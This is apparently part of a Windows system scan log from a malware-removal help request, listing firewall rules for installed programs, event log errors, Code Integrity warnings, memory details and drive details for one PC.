FirewallRules: [{EAB34039-D997-49A7-96B5-57F98CCD1402}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe

FirewallRules: [{CAA82361-BF4D-4259-A3DF-830A363F74C4}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe

FirewallRules: [{50EE1F7B-EEDB-46A0-99F8-FEA2C0BD925D}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe

FirewallRules: [{29B0DB79-257F-40D0-AA83-C1AD16D8ADD7}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe

FirewallRules: [{52D27317-8D42-43FF-A895-4BB64E868B1E}] => (Allow) LPort=3306

FirewallRules: [{3CF0ED6F-3D1A-4F51-9E5E-4C2BD0B5C806}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe

FirewallRules: [{7C4E8E3C-1BB7-4E4C-AE79-DF4AC5C9B8D4}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe

FirewallRules: [{B631FD5E-2E77-4114-A834-AAEDAE48BAF6}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe

FirewallRules: [{D063D9A9-8BBB-481E-933B-CD7F0967A396}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe

FirewallRules: [{07E6D6A7-E7EF-4A4F-91A2-25057ED1E21F}] => (Allow) C:\Program Files (x86)\Intel\IntelAppStore\bin\ismagent.exe

FirewallRules: [{21B98EFC-048E-4BE2-BC33-0890B808A00D}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe

FirewallRules: [{74E32F51-08BF-496A-A141-2D2EAF121968}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe

FirewallRules: [{ED275BE1-9260-49CD-8405-134CE78CD8F7}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe

FirewallRules: [{D288FF71-31C1-4DF5-AFC5-175747EFA260}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe

FirewallRules: [{69B5AC7F-E405-4421-A111-09A6F9EEDD62}] => (Allow) C:\Users\REVERIEN\AppData\Local\Temp\nsd3F3F.tmp\CnetInstaller-75715872.exe

FirewallRules: [{E6B96284-A2D9-4F0E-9CA7-813B79BC8EF0}] => (Allow) C:\Users\REVERIEN\AppData\Local\Temp\nsd3F3F.tmp\CnetInstaller-75715872.exe

FirewallRules: [{8C677F5F-8553-429E-8E5E-7271B10687B7}] => (Allow) C:\Program Files (x86)\Dynamo Combo\bin\DynamoCombo.BRT.Helper.exe

FirewallRules: [{574FD494-3CA7-4021-8A39-F14DA44AFC16}] => (Allow) C:\Program Files (x86)\Dynamo Combo\bin\DynamoCombo.BRT.Helper.exe

FirewallRules: [{CD0B6F4B-0009-4EBC-A245-C5562ACE4FB4}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

FirewallRules: [{C3C2D29B-B322-4EB2-B525-2F1273B1F716}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

FirewallRules: [{E9B53418-4574-45A0-8639-DC0D6707F655}] => (Allow) C:\Users\REVERIEN\AppData\Roaming\Dropbox\bin\Dropbox.exe

FirewallRules: [{F570D4F2-1C74-46C1-BCF1-1120781D9D59}] => (Allow) C:\Users\REVERIEN\AppData\Roaming\Dropbox\bin\Dropbox.exe

FirewallRules: [{9B9610DF-DAF7-4650-B8EB-BE4B5CAAE391}] => (Allow) C:\Program Files (x86)\IBM\SPSS\Statistics\20\stats.com

FirewallRules: [{705BE377-AD8B-4F94-90AB-D2EFCB6644B4}] => (Allow) C:\Program Files (x86)\IBM\SPSS\Statistics\20\WinWrapIDE.exe

FirewallRules: [{02C0309B-F069-4FF4-9696-6487D878C8CE}] => (Allow) C:\Program Files (x86)\IBM\SPSS\Statistics\20\stats.exe

les (x86)\IBM\SPSS\Statistics\20\stats.com

FirewallRules: [{1283C0F1-9220-4572-9FA4-B585067FC7F4}] => (Allow) C:\Program Files (x86)\IBM\SPSS\Statistics\20\WinWrapIDE.exe

FirewallRules: [{3696728A-EA99-464F-A76A-C4298E33CD6A}] => (Allow) C:\Program Files (x86)\IBM\SPSS\Statistics\20\stats.exe

FirewallRules: [{DC0F0CEB-84AC-4464-8BA3-4402EB74A9D6}] => (Allow) C:\Users\REVERIEN\AppData\Local\Temp\7zS7300\HPDiagnosticCoreUI.exe

FirewallRules: [{E5709ADD-BFFA-4A8C-A9B5-7E15E0582DC9}] => (Allow) C:\Users\REVERIEN\AppData\Local\Temp\7zS7300\HPDiagnosticCoreUI.exe

FirewallRules: [{DF2B8723-CEC4-4121-B6DB-19FDA93A6270}] => (Allow) C:\Users\REVERIEN\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe

FirewallRules: [{BAB82F17-DE9D-4248-A0CB-8B5879ADB4D5}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe

FirewallRules: [{54ABF091-1DF9-4B69-B37B-C41E73C69CB6}] => (Allow) LPort=2869

FirewallRules: [{862B93C9-B9A9-48FA-ADA3-55F921FF41A4}] => (Allow) LPort=1900

FirewallRules: [{6F700F9F-D2C2-468C-B86E-5CA39E1D4741}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe

FirewallRules: [{5D10C7CA-B991-4391-B4D4-5C8BB7A03570}] => (Allow) C:\Users\REVERIEN\AppData\Local\Temp\nsl43C7.tmp\Installer-10624532.exe

FirewallRules: [{87A90989-487D-4828-AA46-7A469FF67E99}] => (Allow) C:\Users\REVERIEN\AppData\Local\Temp\nsl43C7.tmp\Installer-10624532.exe

FirewallRules: [{A33D9D2D-3F09-4532-BFCF-3F5E7EB512D8}] => (Allow) C:\Users\REVERIEN\AppData\Local\Temp\nsz302B.tmp\Installer-10624532.exe

FirewallRules: [{AB39E013-B069-4E52-9BE2-E0FFDB0DFFEB}] => (Allow) C:\Users\REVERIEN\AppData\Local\Temp\nsz302B.tmp\Installer-10624532.exe

FirewallRules: [{59651CC9-DAE1-45A7-B149-D8FC70DCE492}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe

FirewallRules: [TCP Query User{FEC06A52-37E7-4021-ACBD-CD78C3D93BDB}C:\users\reverien\appdata\roaming\vseeinstall\vsee.exe] => (Allow) C:\users\reverien\appdata\roaming\vseeinstall\vsee.exe

FirewallRules: [UDP Query User{45B734E6-71F3-4293-868A-6B2043316142}C:\users\reverien\appdata\roaming\vseeinstall\vsee.exe] => (Allow) C:\users\reverien\appdata\roaming\vseeinstall\vsee.exe

FirewallRules: [{80B7C41D-AE8A-4702-8BB8-17C136318964}] => (Block) C:\users\reverien\appdata\roaming\vseeinstall\vsee.exe

FirewallRules: [{EDC8A610-4B6C-4F1E-BD72-B18609B14D31}] => (Block) C:\users\reverien\appdata\roaming\vseeinstall\vsee.exe

FirewallRules: [TCP Query User{9CE82D32-5C0E-4E17-8B6D-E4944A71551B}C:\program files (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe

FirewallRules: [UDP Query User{E86DBDF3-5870-46CB-B2C1-7B01B124FD8B}C:\program files (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe

FirewallRules: [TCP Query User{4064EA95-343A-4444-AA16-7E87ABDFCDA6}C:\program files (x86)\ibm\spss\statistics\20\stats.exe] => (Block) C:\program files (x86)\ibm\spss\statistics\20\stats.exe

FirewallRules: [UDP Query User{47DFAE74-EBA1-4001-8308-3316B9D1FC26}C:\program files (x86)\ibm\spss\statistics\20\stats.exe] => (Block) C:\program files (x86)\ibm\spss\statistics\20\stats.exe

FirewallRules: [TCP Query User{C0110B3C-2BCF-4E80-AEF4-74B2F19B9830}C:\program files (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe] => (Block) C:\program files (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe

FirewallRules: [UDP Query User{7C67A3A5-4C70-435B-A43A-897049E4F23B}C:\program files (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe] => (Block) C:\program files (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe

FirewallRules: [TCP Query User{1C739540-6B6E-4658-85DE-AE84B2115A96}C:\program files\java\jre1.8.0_60\bin\java.exe] => (Allow) C:\program files\java\jre1.8.0_60\bin\java.exe

FirewallRules: [UDP Query User{625CADCA-9AD2-4D93-9946-9935A73F3C1A}C:\program files\java\jre1.8.0_60\bin\java.exe] => (Allow) C:\program files\java\jre1.8.0_60\bin\java.exe

FirewallRules: [{9BE26317-4C02-4241-92DB-A8A1FC476E35}] => (Allow) C:\Program Files\KMSnano\qemu-system-i386.exe

FirewallRules: [{0185FCB4-F83E-476C-8C83-7E96F997E750}] => (Allow) C:\Program Files\KMSnano\qemu-system-i386.exe

FirewallRules: [{A94D9EED-B06D-40EF-BC22-696A748AA005}] => (Allow) c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe

FirewallRules: [TCP Query User{C5F57E73-72B0-41B8-BC44-8684B97CC4DA}C:\program files (x86)\vectir\vectir.exe] => (Allow) C:\program files (x86)\vectir\vectir.exe

FirewallRules: [UDP Query User{739CCF3C-E344-4A02-9C2E-E15BE58C0F42}C:\program files (x86)\vectir\vectir.exe] => (Allow) C:\program files (x86)\vectir\vectir.exe

FirewallRules: [TCP Query User{23EA3972-718B-4DC8-8F47-383CBD730E9E}C:\program files (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\vlc.exe

FirewallRules: [UDP Query User{F0C8441B-10DA-43D0-ADD9-E489B359C9CC}C:\program files (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\vlc.exe

FirewallRules: [{F653B5D8-9AAC-4521-9B17-DFB7DC379077}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe

FirewallRules: [{88671DA2-CC5A-49CB-A0C9-48B72A220E78}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe

FirewallRules: [{91A5D443-9D77-4A0B-8E80-B5D3392DD370}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe

FirewallRules: [{87EF9B94-EE96-466E-BD82-8CE5117E7A10}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe

FirewallRules: [TCP Query User{70B2A856-2AF0-424D-8629-2DB1B396EC82}C:\program files (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\vlc.exe

FirewallRules: [UDP Query User{10211271-2BDC-42C2-B961-8DB4582E4C2F}C:\program files (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\vlc.exe

==================== Restore Points =========================

ATTENTION: System Restore is disabled

==================== Faulty Device Manager Devices =============

Name:

Description:

Class Guid:

Manufacturer:

Service:

Problem: : The drivers for this device are not installed. (Code 28)

Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

==================== Event log errors: =========================

Application errors:

==================

Error: (04/06/2016 03:17:59 PM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: 788: ERROR: read_msg errno 0 (The operation completed successfully.)

Description: ERROR: mDNSPlatformReadTCP - recv: 10053

Error: (04/06/2016 03:16:59 PM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: 776: ERROR: read_msg errno 0 (The operation completed successfully.)

Error: (04/06/2016 03:16:59 PM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: ERROR: mDNSPlatformReadTCP - recv: 10053

Error: (04/06/2016 03:13:59 PM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: 776: ERROR: read_msg errno 0 (The operation completed successfully.)

Error: (04/06/2016 03:13:59 PM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: ERROR: mDNSPlatformReadTCP - recv: 10053

Error: (04/06/2016 03:12:59 PM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: 1016: ERROR: read_msg errno 0 (The operation completed successfully.)

Error: (04/06/2016 03:12:59 PM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: ERROR: mDNSPlatformReadTCP - recv: 10053

Error: (04/06/2016 03:11:59 PM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: 976: ERROR: read_msg errno 0 (The operation completed successfully.)

Error: (04/06/2016 03:11:59 PM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: ERROR: mDNSPlatformReadTCP - recv: 10053

System errors:

=============

Error: (04/06/2016 09:27:29 AM) (Source: Service Control Manager) (EventID: 7031) (User: )

Description: The User Data Access_560cb16 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (04/06/2016 09:27:29 AM) (Source: Service Control Manager) (EventID: 7031) (User: )

Description: The User Data Storage_560cb16 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (04/06/2016 09:27:29 AM) (Source: Service Control Manager) (EventID: 7031) (User: )

Description: The Contact Data_560cb16 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (04/06/2016 09:27:29 AM) (Source: Service Control Manager) (EventID: 7031) (User: )

Description: The Sync Host_560cb16 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (04/06/2016 09:27:28 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)

Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (04/05/2016 08:58:00 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)

Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (04/05/2016 05:02:15 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)

Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (04/05/2016 03:08:37 PM) (Source: bowser) (EventID: 8003) (User: )

Description: The master browser has received a server announcement from the computer ACER

that believes that it is the master browser for the domain on transport NetBT_Tcpip_{D3A7E1A2-BF66-4FA4-B421-289C91B29B3B}.

The master browser is stopping or an election is being forced.

Error: (04/05/2016 02:40:17 PM) (Source: bowser) (EventID: 8003) (User: )

Description: The master browser has received a server announcement from the computer LENOVO

that believes that it is the master browser for the domain on transport NetBT_Tcpip_{C7344E23-A6A5-4EEE-9867-288EC4D5B277}.

The master browser is stopping or an election is being forced.

Error: (04/05/2016 01:02:47 PM) (Source: Service Control Manager) (EventID: 7031) (User: )

Description: The UpdateSvc service terminated unexpectedly. It has done this 2 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.

CodeIntegrity:

=================================== Date: 2016-04-06 09:07:15.285

Description: Code Integrity determined that a process (\Device\HarddiskVolume4 \Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV olume4\Windows\Provider.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-04-06 09:07:15.243

Description: Code Integrity determined that a process (\Device\HarddiskVolume4 \Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV olume4\Windows\Provider.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-04-04 12:03:02.209

Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Windows\Provider.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-04-04 12:03:02.171

Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Windows\Provider.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-04-02 20:08:57.152

Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-03-30 14:43:23.764

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-03-30 14:29:38.240

Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-03-30 13:46:03.397

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-03-30 13:37:25.565

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

==================== Memory info ===========================

Processor: Intel(R) Celeron(R) CPU 1000M @ 1.80GHz

Percentage of memory in use: 53%

Total physical RAM: 6027.22 MB

Available physical RAM: 2815.9 MB

Total Virtual: 8587.22 MB

Available Virtual: 4472.3 MB

==================== Drives ================================

Drive c: (TI31061100A) (Fixed) (Total:119.2 GB) (Free:20.51 GB) NTFS

Drive e: () (Fixed) (Total:166.29 GB) (Free:10.71 GB) NTFS

==================== MBR & Partition Table ==================

========================================================

Disk: 0 (Size: 298.1 GB) (Disk ID: 00000000)

Partition: GPT.

========================================================

Disk: 1 (Size: 7.5 GB) (Disk ID: 00000000)

Partition: GPT.
